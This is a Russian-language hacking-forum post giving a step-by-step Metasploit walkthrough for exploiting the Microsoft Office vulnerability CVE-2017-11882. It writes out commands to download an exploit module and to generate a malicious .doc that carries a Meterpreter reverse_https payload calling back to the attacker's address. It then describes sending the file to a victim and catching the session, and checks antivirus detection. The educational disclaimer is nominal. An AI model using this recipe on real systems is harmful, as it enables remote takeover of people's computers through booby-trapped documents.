Показать сообщение отдельно

  #1  
Старый 26.11.2017, 16:37
adm2
Новичок
Регистрация: 28.08.2008
Сообщений: 3
С нами: 9316533

Репутация: 1
По умолчанию

Добрый день.
Один доллар (@OneDollar)показал пример эксплуатации уязвимости через Empire Powershell

CVE-2017-11882 или Взлом с помощью безобидного документа


Мы рассмотрим альтернативный вариант через Metasploit:
Скачаем и перенесём експлоит

Код:


Код:
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/39a4d193a17c6f85846a58a429c0914f542bded2/modules/exploits/windows/fileformat/office_ms17_11882.rb
cp office_ms17_11882.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/
Запускаем metasploit и выбираем наш модуль.

Код:


Код:
service postgresql start
msfconsole
use exploit/windows/fileformat/office_ms17_11882
Просмотрим информацию о модуле

Код:


Код:
info


Из описания узнаём, что уязвимость существовала на протяжении 17 ЛЕТ! Шикарно, да? Представляете сколько ещё подобного рода CVE неизучено и неизвестно общественности?

Задаём путь, куда metasploit сгенерирует нам файл с нагрузкой

Код:


Код:
set FILENAME /root/exp.doc
Можно поставить и *.rtf, отработает и так и так.

Добавляем пейлоад и запускаем

Код:


Код:
set payload windows/meterpreter/reverse_https
set lhost 192.168.0.100 (адрес атакующего)
set lport 4443 (как обычно, можете выбирать почти любой)
exploit
Собственно, всё.
Берём файл, отправляем клиенту (себе на виртуалку, ибо в целях образовательных используем информацию мы).
Запускаем, ловим сессию.



AV так же не стоит на месте
https://nodistribute.com/result/BUZqx1mACKldLr3
На палевность можете даже и не смотреть ибо через месяц тут будет поголовно всё красное =)

Информация дана для ознакомления, спасибо за внимание)

Альтернативный вариант пост эксплуатации через Empire Powershell
CVE-2017-11882 или Взлом с помощью безобидного документа
 
Ответить с цитированием